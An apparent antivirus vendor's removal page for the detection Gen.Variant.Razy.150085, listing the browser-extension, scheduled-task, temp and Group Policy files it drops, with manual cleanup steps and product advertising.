C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ta\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\id\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ca\messages.json (152 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ta\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\nl\messages.json (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\fil\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt\messages.json (161 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ja\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\uk\messages.json (198 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\Kernel.js (46 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\es_419\messages.json (186 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\hr\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\manifest.json (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ro\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt_PT\messages.json (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\main.css (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ro\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\el\messages.json (197 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\fr\messages.json (190 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\mr\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en_GB\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\am\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\mr\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ru\messages.json (262 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pl\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\arrow.png (332 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon64.png (3 bytes)
%Program Files%\thzXuJvjU\ZzB5QsG.dll (241 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sr\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\mk\messages.json (194 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\background.xul (463 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon48.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\background.js (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ar\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\da\messages.json (153 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\main.css (672 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\et\messages.json (127 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\nl\messages.json (153 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon19.png (815 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ca\messages.json (152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\bg\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\pl\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sr\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\vi\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fa\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sq\messages.json (171 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\hu\messages.json (156 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\kn\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\lt\messages.json (149 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\background.png (109 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\background.js (16 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\no\messages.json (152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\pt_PT\messages.json (161 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\pt_BR\messages.json (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\es\messages.json (186 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ml\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\bindings.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\fa\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sk\messages.json (143 bytes)
C:\Windows\Tasks\uuxHwpnMkRCRpJh.job (274 bytes)
C:\Windows\Tasks\bku3654992853611870.job (462 bytes)
C:\Windows\Tasks\bku2343520322592297.job (468 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_334.exe (250065 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sdfCF40.exe (644 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\SilentInstaller_dotnet4[1].exe (150385 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amipixel.cfg (119 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\amipb[1].js (32188 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\index[1].htm (1133 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\InstallationConfiguration.xml (2242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\installer.dat (667 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\po.db (1 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales (8 bytes)
C:\Windows\System32\GroupPolicy\gpt.ini (268 bytes)
C:\Windows\System32\GroupPolicy\Machine\Registry.pol (2 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"%original file name%.exe" = "c:\%original file name%.exe"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Gen.Variant.Razy.150085_cc1257ab71

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Gen.Variant.Razy.150085_cc1257ab71

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet